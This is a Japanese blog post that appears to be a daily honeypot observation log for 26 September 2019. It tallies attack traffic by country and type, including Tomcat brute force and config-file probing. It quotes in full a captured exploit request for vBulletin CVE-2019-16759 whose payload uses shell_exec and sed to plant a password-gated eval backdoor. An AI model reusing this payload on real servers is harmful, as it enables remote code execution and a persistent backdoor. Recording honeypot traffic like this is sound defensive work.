WOWHoneypot観察(194日目)
2019/09/26(木)
トータルは4111件でした。
ハンティングログはありませんでした。
IPのロケーション別の件数は以下です。
| アルゼンチン | 4004 |
| エストニア | 21 |
| 香港 | 20 |
| ブラジル | 10 |
| アメリカ | 9 |
| 中国 | 5 |
| メキシコ | 4 |
| ベトナム | 4 |
| イラン | 3 |
| イタリア | 3 |
| イギリス | 3 |
| トルコ | 3 |
| オランダ | 2 |
| フランス | 2 |
| ルーマニア | 2 |
| インド | 2 |
| インドネシア | 2 |
| タイ | 2 |
| カザフスタン | 1 |
| ロシア | 1 |
| ブルガリア | 1 |
| リトアニア | 1 |
| フィリピン | 1 |
| ドイツ | 1 |
| モロッコ | 1 |
| コロンビア | 1 |
| ポーランド | 1 |
| マレーシア | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 4003 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 71 | アクセス | GET / |
| 10 | 調査 | HEAD / |
| 5 | vBulletinのゼロデイを狙った通信 | POST /index.php?routestring=ajax/render/widget_php |
| 1 | cfgファイル調査 | GET /vcfg/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /tftproot/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /tftpboot/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /provisioner/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /pps/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /phone/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /pbx/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /p/v2/config/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /p/config/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /p/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /ipeconfig/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /home/tftpboot/0000000000000.cfg |
| 1 | 不明 | GET /fjkasljfklasjlfjklasjklfjlasjkflsa/ |
| 1 | cfgファイル調査 | GET /files/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /configs/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /config/tftp/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /config/sipphone/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /cfgsip/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /cfgs/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /app/provision0000000000000.cfg |
| 1 | cfgファイル調査 | GET /app/0000000000000.cfg |
| 1 | cfgファイル調査 | GET /0000000000000.cfg |
vBulletin 5.x のRCEのゼロデイ(CVE-2019-16759)を狙った通信を観測していました。
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
Content-Length: 378
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipwidgetConfig%5Bcode%5D=echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B
widgetConfig[code]=echo+shell_exec('sed+-i+\'s/eval(\$code);/if+(isset(\$_REQUEST[\"epass\"])+\&\&+\$_REQUEST[\"epass\"]+==+\"2dmfrb28nu3c6s9j\")+{+eval(\$code);+}/g\'+includes/vb5/frontend/controller/bbcode.php+&&+echo+-n+exploited+|+md5sum');+exit;
にほんブログ村